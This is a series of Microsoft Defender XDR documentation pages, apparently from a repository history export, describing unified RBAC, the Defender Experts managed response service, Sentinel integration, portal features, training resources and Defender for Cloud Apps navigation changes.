-All permissions listed within the Microsoft Defender XDR Unified RBAC model align to permissions in the individual RBAC models to ensure backward compatibility. For more information on how the permissions align, see [Map permissions in Microsoft Defender XDR unified role-based access control (RBAC)](compare-rbac-roles.md).
-
-<a name='activation-of-the-microsoft-365-defender-unified-rbac-model'></a>
-
-### Activation of the Microsoft Defender XDR Unified RBAC model
-
-You must activate the workloads in Microsoft Defender XDR to use the Microsoft Defender XDR Unified RBAC model. Until activated, Microsoft Defender XDR continues to respect the existing RBAC models. For more information, see [Activate Microsoft Defender XDR Unified RBAC](activate-defender-rbac.md).
-
-When you activate some or all of your workloads to use the new permission model, the roles and permissions for these workloads are fully controlled by the Microsoft Defender XDR Unified RBAC model in the Microsoft Defender portal.
-
-<a name='start-using-microsoft-365-defender-unified-rbac-model'></a>
-
-## Start using Microsoft Defender XDR Unified RBAC model
-
-Use the following steps as a guide to start using the Microsoft Defender XDR Unified RBAC model:
-
-1. **Get started with creating custom roles and importing roles from existing RBAC role models**
- - [Create custom roles](create-custom-rbac-roles.md)
- - [Import existing RBAC roles](import-rbac-roles.md)
- - [View, edit, and delete RBAC roles](edit-delete-rbac-roles.md)
-
-2. **Activate and manage your roles with the Microsoft Defender XDR Unified RBAC model**
- - [Activate Microsoft Defender XDR Unified RBAC](activate-defender-rbac.md)
-
-3. **Learn more about the Microsoft Defender XDR Unified RBAC model**
- - [Microsoft Defender XDR Unified RBAC permissions](custom-permissions-details.md)
- - [Map existing RBAC roles to Microsoft Defender XDR Unified RBAC roles](compare-rbac-roles.md)
-
-Watch the following video to see the preceding steps in action:
-
-> [!VIDEO https://www.microsoft.com/en-us/videoplayer/embed/RW12hyh]
-
security Managed Detection And Response Xdr https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/managed-detection-and-response-xdr.md
- Title: Managed detection and response -
-description: Defender Experts for XDR provides actionable managed response to your security operations center (SOC) teams.
------
- - m365-security
- - tier1
- - essentials-manage
- Previously updated : 03/07/2024--
-# Managed detection and response
-
-**Applies to:**
--- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-Through a combination of automation and human expertise, Microsoft Defender Experts for XDR triages Microsoft Defender XDR incidents, prioritizes them on your behalf, filters out the noise, carries out detailed investigations, and provides actionable managed response to your security operations center (SOC) teams.
-
-## Incident updates
-
-Once our experts start investigating an incident, the incident's **Assigned to** and **Status** fields are updated to _Defender Experts_ and _In progress_, respectively.
-
-When our experts conclude their investigation on an incident, the incident's **Classification** field is updated to one of the following, depending on the experts' findings:
--- True Positive-- False Positive-- Informational, Expected Activity-
-The **Determination** field corresponding to each classification is also updated to provide more insights on the findings that led our experts to determine the said classification.
--
-If an incident is classified as _False Positive_ or _Informational_, _Expected Activity_, then the incident's **Status** field gets updated to _Resolved_. Our experts then conclude their work on this incident and the **Assigned to** field gets updated to _Unassigned_. Our experts may share updates from their investigation and their conclusion when resolving an incident. These updates are posted in the incident's **Comments and history** flyout panel.
-
-> [!NOTE]
-> Incident comments are one-way posts. Defender Experts can't respond to any comments or questions you add in the **Comments and history** panel. For more information about how to correspond with our experts, see [Communicating with experts in the Microsoft Defender Experts for XDR service](communicate-defender-experts-xdr.md).
-
-Otherwise, if an incident is classified as _True Positive_, our experts then identify the required response actions that need to be performed. The method in which the actions are performed depends on the permissions and access levels you have given the Defender Experts for XDR service. [Learn more about granting permissions to our experts](get-started-xdr.md#grant-permissions-to-our-experts).
--- If you have granted Defender Experts for XDR the recommended Security Operator access permissions, our experts could perform the required response actions on the incident on your behalf. These actions, along with an **Investigation summary**, show up in the incident's [Managed response](#how-to-use-managed-response-in-microsoft-365-defender) flyout panel in your Microsoft Defender portal for you or your SOC team to review. All actions that are completed by Defender Experts for XDR appear under the **Completed actions** section. Any pending actions that require you or you SOC team to complete are listed under the **Pending actions** section. For more information, see the [Actions](#actions) section. Once our experts have taken all the necessary actions on the incident, its **Status** field is then updated to _Resolved_ and the **Assigned to** field is updated to _Unassigned_.--- If you have granted Defender Experts for XDR the default Security Reader access, then the required response actions, along with an **Investigation summary**, show up in the incident's **Managed response** flyout panel under the **Pending actions** section in your Microsoft Defender portal for you or your SOC team to perform. For more information, see the [Actions](#actions) section. To identify this handover, the incident's **Status** field is updated to _Awaiting Customer Action_ and the **Assigned to** field is updated to _Customer_.-
-You can check the number of incidents that require your action in the Defender Experts banner at the top of the Microsoft Defender homepage.
--
-To view the incidents our experts have investigated or are currently investigating, filter the incident queue in your Microsoft Defender portal using the _Defender Experts_ tag.
--
-<a name='how-to-use-managed-response-in-microsoft-365-defender'></a>
-
-## How to use managed response in Microsoft Defender XDR
-
-In the Microsoft Defender portal, an incident that requires your attention using managed response has the **Assigned to** field set to _Customer_ and a task card on top of the **Incidents** pane. Your designated incident contacts also receives a corresponding email notification with a link to the Defender portal to view the incident. [Learn more about notification contacts](get-started-xdr.md#tell-us-who-to-contact-for-important-matters).
-
-Select **View managed response** on the task card or on the top of the portal page (**Managed response** tab) to open a flyout panel where you can read our experts' investigation summary, complete pending actions identified by our experts, or engage with them through chat.
-
-### Investigation summary
-
-The **Investigation summary** section provides you with more context about the incident analyzed by our experts to provide you with visibility about its severity and potential impact if not addressed immediately. It could include the device timeline, indicators of attack, and indicators of compromise (IOCs) observed, and other details.
--
-### Actions
-
-The **Actions** tab displays task cards that contain response actions recommended by our experts.
-
-Defender Experts for XDR currently supports the following one-click managed response actions:
-
-|**Action**|**Description**|
-||--|
-|[Isolate device](/microsoft-365/security/defender-endpoint/respond-machine-alerts##isolate-devices-from-the-network)|Isolates a device, which helps prevent an attacker from controlling it and performing further activities such as data exfiltration and lateral movement. The isolated device will still be connected to Microsoft Defender for Endpoint.|
-|[Quarantine file](/microsoft-365/security/defender-endpoint/respond-file-alerts##stop-and-quarantine-files)|Stops running processes, quarantines the files, and deletes persistent data such as registry keys.|
-|[Restrict app execution](/microsoft-365/security/defender-endpoint/respond-machine-alerts##restrict-app-execution)| Restricts the execution of potentially malicious programs and locks down the device to prevent further attempts.|
-|[Release from isolation](/microsoft-365/security/defender-endpoint/respond-machine-alerts#isolate-devices-from-the-network)| Undoes isolation of a device.|
-|[Remove app restriction](/microsoft-365/security/defender-endpoint/respond-machine-alerts#restrict-app-execution)| Undoes release from isolation.|
-
-Apart from these one-click actions, you can also receive managed responses from our experts that you need to perform manually.
-
-> [!NOTE]
-> Before performing any of the recommended managed response actions, make sure that they are not already being addressed by your automated investigation and response configurations. [Learn more about automated investigation and response capabilities in Microsoft Defender XDR](m365d-autoir.md).
-
-**To view and perform the managed response actions:**
-
-1. Select the arrow buttons in an action card to expand it and read more information about the required action.
--
-2. For cards with one-click response actions, select the required action. The **Action status** in the card changes to **In progress**, then to **Failed** or **Completed**, depending on the action's outcome.
--
-> [!TIP]
-> You can also monitor the status of in-portal response actions in the [Action center](m365d-action-center.md). If a response action fails, try doing it again from the **View device details** page or [initiate a chat](communicate-defender-experts-xdr.md#in-portal-chat) with Defender Experts.
-
-3. For cards with required actions that you need to perform manually, select **I've completed this action** once you've performed them, then select **Yes, I've done it** in the confirmation dialog box that appears.
--
-4. If you don't want to complete a required action right away, select **Skip**, then select **Yes, skip this action** in the confirmation dialog box that appears.
-
-> [!IMPORTANT]
->If you notice that any of the buttons on the action cards are grayed out, it could indicate that you don't have the necessary permissions to perform the action. Make sure that you're signed into the Microsoft Defender XDR portal with the appropriate permissions. Most managed response actions require that you have at least the Security Operator access. If you still encounter this issue even with the appropriate permissions, navigate to **View device details** and complete the steps from there.
-
-## Get visibility to Defender Experts investigations in your SIEM or ITSM application
-
-As Defender Experts for XDR investigate incidents and come up with remediation actions, you can have visibility to their work on incidents in your security information and event management (SIEM) and IT service management (ITSM) applications, including applications that are available out of the box.
-
-### Microsoft Sentinel
-
-You can get incident visibility in Microsoft Sentinel by turning on its out-of-the-box Microsoft Defender XDR data connector. [Learn more](/azure/sentinel/connect-microsoft-365-defender).
-
-Once you have turned on the connector, updates by Defender Experts to the **Status**, **Assigned to**, **Classification**, and **Determination** fields in Microsoft Defender XDR will show up in the corresponding **Status**, **Owner**, and **Reason for closing** fields in Sentinel.
-
-> [!NOTE]
-> The status of incidents investigated by Defender Experts in Microsoft Defender XDR typically transitions from _Active_ to _In progress_ to _Awaiting Customer Action_ to _Resolved_, while in Sentinel, it follows the _New_ to _Active_ to _Resolved_ path. The Microsoft Defender XDR Status _**Awaiting Customer Action**_ doesn't have an equivalent field in Sentinel; instead, it's displayed as a tag in an incident in Sentinel.
-
-The following section describes how an incident handled by our experts is updated in Sentinel as it progresses through the investigation journey:
-
-1. An incident being investigated by our experts has the **Status** listed as _Active_ and the **Owner** listed as _Defender Experts_.
-1. An incident that our experts have confirmed as a _True Positive_ has a managed response posted in Microsoft Defender XDR, and a **Tag** _Awaiting Customer Action_ and the **Owner** is listed as _Customer_. You need to act on the incident based on using the provided managed response.
-1. Once our experts have concluded their investigation and closed an incident as _False Positive_ or _Informational_, _Expected Activity_, the incident's **Status** is updated to _Resolved_, the **Owner** is updated to _Unassigned_, and a **Reason for closing** is provided.
--
-### Other applications
-
-You could obtain visibility into incidents in your SIEM or ITSM application by using the [Microsoft Defender XDR API](../defender/api-overview.md) or [connectors in Sentinel](/azure/sentinel/data-connectors-reference).
-
-After configuring a connector, the updates by Defender Experts to an incident's **Status**, **Assigned to**, **Classification**, and **Determination** fields in Microsoft Defender XDR can be synchronized with the third-party SIEM or ITSM applications, depending on how the field mapping has been implemented. To illustrate, you can take a look at the [connector available from Sentinel to ServiceNow](https://github.com/Azure/Azure-Sentinel/tree/master/Solutions/Servicenow/StoreApp).
-
-### See also
--- [Understanding and managing Defender Experts for XDR incident notifications](faq-incident-notifications-xdr.md)-- [Understanding managed response](faq-managed-response.md)-- [Get real-time visibility with Defender Experts for XDR reports](reports-xdr.md)-
security Microsoft 365 Defender Integration With Azure Sentinel https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/microsoft-365-defender-integration-with-azure-sentinel.md
- Title: Microsoft Defender XDR integration with Microsoft Sentinel
-description: Use Microsoft Sentinel as the SIEM for Microsoft Defender XDR incident and events.
-
- - NOCSH
----
- - m365-security
- - tier3
-
- - MOE150
- - MET150
Previously updated : 02/22/2023--
-# Microsoft Defender XDR integration with Microsoft Sentinel
--
-**Applies to:**
-- Microsoft Defender XDR-
-The Microsoft Defender XDR connector for Microsoft Sentinel sends all Microsoft Defender XDR incidents and alerts information to Microsoft Sentinel and keeps the incidents synchronized.
-
-Once you add the connector, Microsoft Defender XDR incidents&mdash;which include all associated alerts, entities, and relevant information received from Microsoft Defender for Endpoint, Microsoft Defender for Identity, Microsoft Defender for Office 365, and Microsoft Defender for Cloud Apps&mdash;are streamed to Microsoft Sentinel as security information and event management (SIEM) data, providing you with context to perform triage and incident response with Microsoft Sentinel.
-
-Once in Microsoft Sentinel, incidents remain bi-directionally synchronized with Microsoft Defender XDR, allowing you to take advantage of the benefits of both the Microsoft Defender portal and Microsoft Sentinel in the Azure portal for incident investigation and response.
-
-Watch this short overview of Microsoft Sentinel integration with Microsoft Defender XDR (4 minutes).
-
-<br>
-
->[!VIDEO https://www.microsoft.com/en-us/videoplayer/embed/RWFIRo]
--
-Here's how it works.
--
-## Next steps
-
-1. Get a deeper understanding of [Microsoft Defender XDR integration with Microsoft Sentinel](/azure/sentinel/microsoft-365-defender-sentinel-integration).
-2. [Connect data from Microsoft Defender XDR to Microsoft Sentinel](/azure/sentinel/connect-microsoft-365-defender).
-
-## See also
--- [Overview of incidents in Microsoft Defender XDR](incidents-overview.md)-- [Investigate incidents with Microsoft Sentinel](/azure/sentinel/tutorial-investigate-cases)
security Microsoft 365 Defender Portal https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/microsoft-365-defender-portal.md
- Title: Microsoft Defender portal
-description: Learn about the Microsoft Defender portal as the central location for protection, detection, investigation, and response to email, collaboration, identity, device, and app threats.
-
- - NOCSH
----
- - m365-security
- - tier1
- - essentials-manage
- - usx-security
-
- - admindeeplinkDEFENDER
- - intro-overview
- Previously updated : 03/26/2024--
-# Microsoft Defender portal
-
-The Microsoft Defender portal at <https://security.microsoft.com> combines protection, detection, investigation, and response to threats across your entire organization and all its components, in a central place. The Defender portal emphasizes quick access to information, simpler layouts, and bringing related information together for easier use. It includes:
--- **[Microsoft Defender for Office 365](/microsoft-365/security/office-365-security/defender-for-office-365)** helps organizations secure their enterprise with a set of prevention, detection, investigation and hunting features to protect email, and Office 365 resources.-- **[Microsoft Defender for Endpoint](/microsoft-365/security/defender-endpoint/microsoft-defender-advanced-threat-protection)** delivers preventative protection, post-breach detection, automated investigation, and response for devices in your organization.-- **[Microsoft Defender for Identity](/defender-for-identity/what-is)** is a cloud-based security solution that uses your on-premises Active Directory signals to identify, detect, and investigate advanced threats, compromised identities, and malicious insider actions directed at your organization.-- **[Microsoft Defender for Cloud Apps](/cloud-app-security/)** is a comprehensive cross-SaaS and PaaS solution bringing deep visibility, strong data controls, and enhanced threat protection to your cloud apps.-- **[Microsoft Sentinel](/azure/sentinel/)** is a cloud-native security information and event management (SIEM) solution that provides proactive threat detection, investigation, and response.--
-Watch this short video to learn about the Defender portal.
-
-> [!VIDEO https://www.microsoft.com/en-us/videoplayer/embed/RWBKau]
-
-## What to expect
-
-The Microsoft Defender portal helps security teams investigate and respond to attacks by bringing in signals from different workloads into a set of unified experiences for:
--- Incidents & alerts-- Hunting-- Actions & submissions-- Threat analytics-- Secure score-- Learning hub-- Trials-- Partner catalog-
-The Microsoft Defender portal emphasizes *unity, clarity, and common goals*.
-
-> [!NOTE]
-> In the Microsoft Defender portal, customers see only the security features their subscription includes. For example, if you have Defender for Office 365 but not Defender for Endpoint, you see features and capabilities for Defender for Office 365, but not device protection.
-
-## Incident and alert investigations
-
-Centralizing security information creates a single place to investigate security incidents across your entire organization and all its components including:
--- Hybrid identities-- Endpoints-- Cloud apps-- Business apps-- Email and docs-- IoT-- Network-- Business applications-- Operational technology (OT)-- Infrastructure and cloud workloads-
-A primary example is **Incidents** under **Incidents & alerts**.
--
-Selecting an incident name displays a page that demonstrates the value of centralizing security information as you get better insights into the full extend of a threat, from email, to identity, to endpoints.
--
-Take the time to review the incidents in your environment, drill down into each alert, and practice building an understanding of how to access the information and determine next steps in your analysis.
-
-For more information, see [Incidents in the Microsoft Defender portal](incidents-overview.md).
-
-## Hunting
-
-You can build custom detection rules and hunt for specific threats in your environment. **Hunting** uses a query-based threat hunting tool that lets you proactively inspect events in your organization to locate threat indicators and entities. These rules run automatically to check for, and then respond to, suspected breach activity, misconfigured machines, and other findings.
-
-For more information, see [Proactively hunt for threats with advanced hunting in Microsoft Defender XDR](advanced-hunting-overview.md).
-
-## Improved processes
-
-Common controls and content either appear in the same place, or are condensed into one feed of data making it easier to find. For example, find unified settings under **Settings** and permissions under **Permissions**.
-
-### Unified settings
--
-### Permissions
--
-Access to Microsoft Defender XDR is configured with Microsoft Entra global roles or by using custom roles.
--- Learn more about how to [manage access to Microsoft Defender XDR](m365d-permissions.md)-- Learn more about how to [create custom roles](custom-roles.md) in Microsoft Defender XDR-
-For Microsoft Sentinel, after you connect Microsoft Sentinel to the Defender portal, your existing Azure role-based access control (RBAC) permissions allow you to work with the Microsoft Sentinel features that you have access to. Continue to manage roles and permissions for your Microsoft Sentinel users from the Azure portal. Any Azure RBAC changes are reflected in the Defender portal. For more information about Microsoft Sentinel permissions, see:
--- [Roles and permissions in Microsoft Sentinel | Microsoft Learn](/azure/sentinel/roles)-- [Manage access to Microsoft Sentinel data by resource | Microsoft Learn](/azure/sentinel/resource-context-rbac)--
-### Integrated reports
-
-Reports are also unified in Microsoft Defender XDR. Admins can start with a general security report, and branch into specific reports about endpoints, email & collaboration. The links here are dynamically generated based upon workload configuration.
-
-### Quickly view your Microsoft 365 environment
-
-The **Home** page shows many of the common cards that security teams need. The composition of cards and data is dependent on the user role. Because the Defender portal uses role-based access control, different roles see cards that are more meaningful to their day to day jobs.
-
-This at-a-glance information helps you keep up with the latest activities in your organization. Microsoft Defender XDR brings together signals from different sources to present a holistic view of your Microsoft 365 environment.
-
-You can add and remove different cards depending on your needs.
-
-### Search across entities (Preview)
-
-> [!IMPORTANT]
-> Some information relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here. The search bar is located at the top of the page. As you type, suggestions are provided so that it's easier to find entities. The enhanced search results page centralizes the results from all entities.
-
-You can search across the following entities in Defender for Endpoint and Defender for Identity:
--- **Devices** - supported for both Defender for Endpoint and Defender for Identity. Supports use of search operators.-- **Users** - supported for Defender for Endpoint, Defender for Identity, and Defender for Cloud Apps.-- **Files, IPs, and URLs** - same capabilities as in Defender for Endpoint.-
- > [!NOTE]
- > IP and URL searches are exact match and don't appear in the search results page ΓÇô they lead directly to the entity page.
--- **MDVM** - same capabilities as in Defender for Endpoint (vulnerabilities, software, and recommendations).-
-## Threat analytics
-
-Track and respond to emerging threats with the following Microsoft Defender XDR threat analytics:
-Threat analytics is the Microsoft Defender XDR threat intelligence solution from expert Microsoft security researchers. It's designed to assist security teams to be as efficient as possible while facing emerging threats, such as:
--- Active threat actors and their campaigns-- Popular and new attack techniques-- Critical vulnerabilities-- Common attack surfaces-- Prevalent malware-
-## Partner catalog
-
-Microsoft Defender XDR supports two types of partners:
--- Third-party integrations to help secure users with effective threat protection, detection, investigation, and response in various security fields of endpoints, vulnerability management, email, identities, and cloud apps.-- Professional services where organizations can enhance the detection, investigation, and threat intelligence capabilities of the platform.-
-## Send us your feedback
-
-We need your feedback. If there's something you'd like to see, [watch this video to find out how you can trust us to read your feedback](https://www.microsoft.com/videoplayer/embed/RE4K5Ci).
-
-## Explore what the Defender portal has to offer
-
-Keep exploring the features and capabilities in the Defender portal:
--- [Manage incidents and alerts](manage-incidents.md)-- [Track and respond to emerging threats with threat analytics](threat-analytics.md)-- [The Action center](m365d-action-center.md)-- [Hunt for threats across devices, emails, apps, and identities](./advanced-hunting-query-emails-devices.md)-- [Custom detection rules](./custom-detection-rules.md)-- [Email & collaboration alerts](../../compliance/alert-policies.md#default-alert-policies)-- [Create a phishing attack simulation](../office-365-security/attack-simulation-training-simulations.md) and [create a payload for training your teams](/microsoft-365/security/office-365-security/attack-simulation-training-payloads)-
-To explore capabilities related to the Microsoft Sentinel integration with Microsoft Defender XDR in the unified security operations platform (preview), see [Microsoft Sentinel in the Microsoft Defender portal](https://go.microsoft.com/fwlink/p/?linkid=2263690).
-
-## Training for security analysts
-
-With this learning path from Microsoft Learn, you can understand Microsoft Defender XDR and how it can help identify, control, and remediate security threats.
-
-|Training:|Mitigate threats using Microsoft Defender XDR|
-|||
-|![Microsoft Defender XDR training icon.](../../media/microsoft-365-defender/m365-defender-secure-organization.svg)|Analyze threat data across domains and rapidly remediate threats with built-in orchestration and automation in Microsoft Defender XDR. This learning path aligns with exam SC-200: Microsoft Security Operations Analyst.<p> 9 hr 31 min - Learning Path - 11 Modules|
-
-> [!div class="nextstepaction"]
-> [Start >](/training/paths/sc-200-mitigate-threats-using-microsoft-365-defender/)
-
-## See also
--- [What's new in Microsoft Defender XDR](whats-new.md)-- [Microsoft Defender for Office 365 in the Microsoft Defender portal](microsoft-365-security-center-mdo.md)-- [Microsoft Defender for Endpoint in Microsoft Defender portal](microsoft-365-security-center-mde.md)-- [Microsoft Defender for Identity in the Microsoft Defender portal](microsoft-365-security-center-mdi.md)-- [Microsoft Defender for Cloud Apps in Microsoft Defender XDR](microsoft-365-security-center-defender-cloud-apps.md)-- [Microsoft Defender for Cloud in the Microsoft Defender portal](microsoft-365-security-center-defender-cloud.md)-- [Microsoft Sentinel in the Microsoft Defender portal](https://go.microsoft.com/fwlink/p/?linkid=2263690)-
security Microsoft 365 Defender Train Security Staff https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/microsoft-365-defender-train-security-staff.md
- Title: Train your security staff for Microsoft Defender XDR
-description: Get to the key training resources for quick ramp-up of your security staff.
-
- - NOCSH
----
- - m365-security
- - tier3
-
- - MOE150
- - MET150
Previously updated : 01/03/2022--
-# Train your security staff for Microsoft Defender XDR
--
-**Applies to:**
-- Microsoft Defender XDR-
-With the urgency of protecting your organization and its data from attackers, you need to quickly onboard your security staff to Microsoft Defender XDR. Microsoft provides multiple types of learning and self-study resources for Microsoft Defender XDR and associated services.
--
-<a name='microsoft-365-defender-ninja-training'></a>
-
-## Microsoft Defender XDR Ninja training
-
-[Microsoft Defender XDR Ninja training](https://techcommunity.microsoft.com/t5/microsoft-365-defender/become-a-microsoft-365-defender-ninjash;but does not cover the individual sources themselves.
-
-The content is structured into three different knowledge levels, with multiple modules: Fundamentals, Intermediate, and Expert. Each level includes a knowledge check to test your understanding of the material.
-
-## Learning paths
-
-Use these learning paths and their modules to build an understanding of Microsoft Defender XDR and Microsoft Defender for Endpoint, one module and unit at a time.
----
-<a name='learning-paths-in-the-microsoft-365-defender-portal-learning-hub'></a>
-
-## Learning paths in the Microsoft Defender portal learning hub
-
-The [Microsoft Defender portal learning hub](https://security.microsoft.com/learning) includes these learning paths:
--- Getting started with the Microsoft 365 security center-- How to Investigate Using Microsoft Defender XDR-- Microsoft Defender XDR Basic Training-- Microsoft Defender for Endpoint Basic Training-- Microsoft Defender for Office 365 Best Practices-- Setup-
-## Hands-on with a trial environment
-
-One of the best ways to learn is by configuring and testing Microsoft Defender XDR and its associated services in a trial environment. See [Evaluate and pilot Microsoft Defender XDR](eval-overview.md) for the details.
-
-## Simulating an attack
-
-To test your security staff on their ability to detect and respond to a cyberattack, use a simulated attack. See [Simulate attacks with the Microsoft Defender portal](eval-defender-investigate-respond-simulate-attack.md#simulate-attacks-with-the-microsoft-365-defender-portal) for more information.
security Microsoft 365 Defender https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/microsoft-365-defender.md
- Title: What is Microsoft Defender XDR?
-description: Microsoft Defender XDR is a coordinated threat protection solution designed to protect devices, identity, data, and applications.
-
- - NOCSH
---
- - admindeeplinkDEFENDER
- - intro-overview
--- essentials-overview-- tier1-
-adobe-target: true
Previously updated : 03/28/2024
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
---
-# What is Microsoft Defender XDR?
--
-Microsoft Defender XDR is a unified pre- and post-breach enterprise defense suite that natively coordinates detection, prevention, investigation, and response across endpoints, identities, email, and applications to provide integrated protection against sophisticated attacks.
-
-Microsoft Defender XDR helps security teams protect and detect their organizations by using information from other Microsoft security products, including:
--- [**Microsoft Defender for Endpoint**](../defender-endpoint/microsoft-defender-endpoint.md)-- [**Microsoft Defender for Office 365**](../office-365-security/mdo-about.md#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet)-- [**Microsoft Defender for Identity**](/defender-for-identity/what-is)-- [**Microsoft Defender for Cloud Apps**](/defender-cloud-apps/what-is-defender-for-cloud-apps)-- [**Microsoft Defender Vulnerability Management**](../defender-vulnerability-management/defender-vulnerability-management.md)-- [**Microsoft Entra ID Protection**](/azure/active-directory/identity-protection/overview-identity-protection)-- [**Microsoft Data Loss Prevention**](/microsoft-365/compliance/dlp-learn-about-dlp)-- [**App Governance**](/defender-cloud-apps/app-governance-manage-app-governance)--
-With the integrated Microsoft Defender XDR solution, security professionals can stitch together the threat signals that each of these products receive and determine the full scope and impact of the threat; how it entered the environment, what it's affected, and how it's currently impacting the organization. Microsoft Defender XDR takes automatic action to prevent or stop the attack and self-heal affected mailboxes, endpoints, and user identities.
-
-<a name='microsoft-365-defender-protection'></a>
-
-## Microsoft Defender XDR protection
-
-Microsoft Defender XDR services protect:
--- **Endpoints with Defender for Endpoint** - Defender for Endpoint is a unified endpoint platform for preventative protection, post-breach detection, automated investigation, and response.--- **Assets with Defender Vulnerability Management** - Microsoft Defender Vulnerability Management delivers continuous asset visibility, intelligent risk-based assessments, and built-in remediation tools to help your security and IT teams prioritize and address critical vulnerabilities and misconfigurations across your organization.--- **Email and collaboration with Defender for Office 365** - Defender for Office 365 safeguards your organization against malicious threats posed by email messages, links (URLs) and collaboration tools.--- **Identities with Defender for Identity and Microsoft Entra ID Protection** - Microsoft Defender for Identity is a cloud-based security solution that uses your on-premises Active Directory signals to identify, detect, and investigate advanced threats, compromised identities, and malicious insider actions directed at your organization. Microsoft Entra ID Protection uses the learnings Microsoft acquired from their position in organizations with Microsoft Entra ID, the consumer space with Microsoft Accounts, and in gaming with Xbox to protect your users.--- **Applications with Microsoft Defender for Cloud Apps** - Microsoft Defender for Cloud Apps is a comprehensive cross-SaaS solution bringing deep visibility, strong data controls, and enhanced threat protection to your cloud apps.-
-Microsoft Defender XDR's unique cross-product layer augments the individual service components to:
--- Help protect against attacks and coordinate defensive responses across the services through signal sharing and automated actions.--- Narrate the full story of the attack across product alerts, behaviors, and context for security teams by joining data on alerts, suspicious events and impacted assets to incidents.--- Automate response to compromise by triggering self-healing for impacted assets through automated remediation.--- Enable security teams to perform detailed and effective threat hunting across endpoint and Office data.-
-Microsoft Defender XDR cross-product features include:
--- **Cross-product single pane of glass in the Microsoft Defender portal** - A central view for all information on detections, impacted assets, automated actions taken, and related evidence in a single queue and a single pane in <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a>. --- **Combined incidents queue** - To help security professionals focus on what is critical by ensuring the full attack scope, impacted assets and automated remediation actions are grouped together and surfaced in a timely manner. --- **Automatic response to threats** - Critical threat information is shared in real time between the Microsoft Defender XDR products to help stop the progression of an attack. -
- For example, if a malicious file is detected on an endpoint protected by Defender for Endpoint, it instructs Defender for Office 365 to scan and remove the file from all e-mail messages. The file is blocked on sight by the entire Microsoft 365 security suite.
--- **Self-healing for compromised devices, user identities, and mailboxes** - Microsoft Defender XDR uses AI-powered automatic actions and playbooks to remediate impacted assets back to a secure state. Microsoft Defender XDR leverages automatic remediation capabilities of the suite products to ensure all impacted assets related to an incident are automatically remediated where possible.--- **Cross-product threat hunting** - Security teams can leverage their unique organizational knowledge to hunt for signs of compromise by creating their own custom queries over the raw data collected by the various protection products. Microsoft Defender XDR provides query-based access to 30 days of historic raw signals and alert data across endpoint and Defender for Office 365 data.-
-## Get started
-
-Microsoft Defender XDR licensing requirements must be met before you can enable the service in the Microsoft Defender portal at <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank"><https://security.microsoft.com></a> For more information, see:
--- [Licensing requirements](prerequisites.md#licensing-requirements)-- [Turn on Microsoft Defender XDR](m365d-enable.md)--
security Microsoft 365 Security Center Defender Cloud Apps https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/microsoft-365-security-center-defender-cloud-apps.md
- Title: Microsoft Defender for Cloud Apps in Microsoft Defender XDR
-description: Learn about changes from the Microsoft Defender for Cloud Apps to Microsoft Defender XDR
--- NOCSH--- Previously updated : 12/17/2023--- MOE150-- MET150--- m365-security -- tier2---
-# Microsoft Defender for Cloud Apps in Microsoft Defender XDR
--
-**Applies to:**
--- [Microsoft Defender XDR](microsoft-365-defender.md)-- [Microsoft Defender for Cloud Apps](/defender-cloud-apps/)-
-Microsoft Defender for Cloud Apps is now part of Microsoft Defender XDR. The Microsoft Defender portal allows security admins to perform their security tasks in one location. This simplifies workflows, and adds the functionality of the other Microsoft Defender XDR services. Microsoft Defender XDR will be the home for monitoring and managing security across your Microsoft identities, data, devices, apps, and infrastructure.
-
-SOC analysts will be able to triage, investigate and hunt across all Microsoft Defender XDR workloads, including cloud apps.
-
-Defender for Cloud Apps **alerts** will continue to appear in Microsoft Defender XDR's incidents queue and alerts queue, but now with relevant content inside the alert pages available in the Microsoft Defender portal, in a unified format with the proper adaptations to each alerts type. For more information, see [Investigate incidents in Microsoft Defender XDR](/microsoft-365/security/defender/investigate-incidents).
-
-Take a look in Microsoft Defender XDR at <https://security.microsoft.com>.
-
-Learn more about the benefits: [Overview of Microsoft Defender XDR](microsoft-365-defender.md).
-
-## Quick reference
-
-The images and the tables below list the changes in navigation between Microsoft Defender for Cloud Apps and Microsoft Defender XDR.
-
-### Discover
-
-> [!div class="mx-imgBorder"]
-> :::image type="content" source="../../media/defender-cloud-apps-m365-defender-discover.png" alt-text="The new locations for Cloud Discovery features in the Microsoft Defender portal" lightbox="../../media/defender-cloud-apps-m365-defender-discover.png":::
-
-| Defender for Cloud Apps | Microsoft Defender XDR |
-|||
-| Cloud Discover dashboard | Cloud apps -> Cloud discovery |
-| Discovered Apps | tab on Cloud Discovery page |
-| Discovered resources | tab on Cloud Discovery page |
-| IP addresses | tab on Cloud Discovery page |
-| Users | tab on Cloud Discovery page |
-| Devices | tab on Cloud Discovery page |
-| Cloud app catalog | Cloud apps -> Cloud app catalog |
-| Create Cloud Discovery snapshot report | On the Cloud Discovery page, under Actions |
-
-### Investigate
-
-> [!div class="mx-imgBorder"]
-> :::image type="content" source="../../media/defender-cloud-apps-m365-defender-investigate.png" alt-text="The new locations for Investigation features in the Microsoft Defender portal" lightbox="../../media/defender-cloud-apps-m365-defender-investigate.png":::
-
-| Defender for Cloud Apps | Microsoft Defender XDR |
-|||
-| Activity log | Cloud apps -> Activity log |
-| Files | Cloud apps -> Files |
-| Users and accounts | Assets -> Identities |
-| Security configuration | available in [Microsoft Defender for Cloud](/azure/defender-for-cloud/defender-for-cloud-introduction) |
-| Identity security posture | [Microsoft Defender for Identity's identity security posture assessments](/defender-for-identity/isp-overview) |
-| OAuth apps | Cloud apps -> OAuth apps |
-| Connected apps | Settings -> Cloud apps -> Connected apps |
-
-### Control
-
-> [!div class="mx-imgBorder"]
